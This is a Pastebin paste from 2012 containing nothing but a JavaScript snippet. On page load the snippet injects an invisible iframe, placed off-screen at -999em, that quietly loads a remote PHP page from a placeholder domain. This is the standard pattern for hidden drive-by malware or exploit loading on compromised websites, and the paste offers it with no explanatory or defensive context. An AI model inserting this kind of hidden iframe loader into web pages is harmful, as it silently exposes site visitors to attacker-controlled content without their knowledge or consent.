Advertisement
xanda

Untitled

Sep 25th, 2012
932
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <script type="text/javascript">
  2. function frmAdd() {
  3. var ifrm = document.createElement('iframe');
  4. ifrm.style.position='absolute';
  5. ifrm.style.top='-999em';
  6. ifrm.style.left='-999em';
  7. ifrm.src  = "http://somedomain.com/somefile.php";
  8. ifrm.id = 'frmId';
  9. document.body.appendChild(ifrm);
  10. };
  11. window.onload = frmAdd;
  12. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement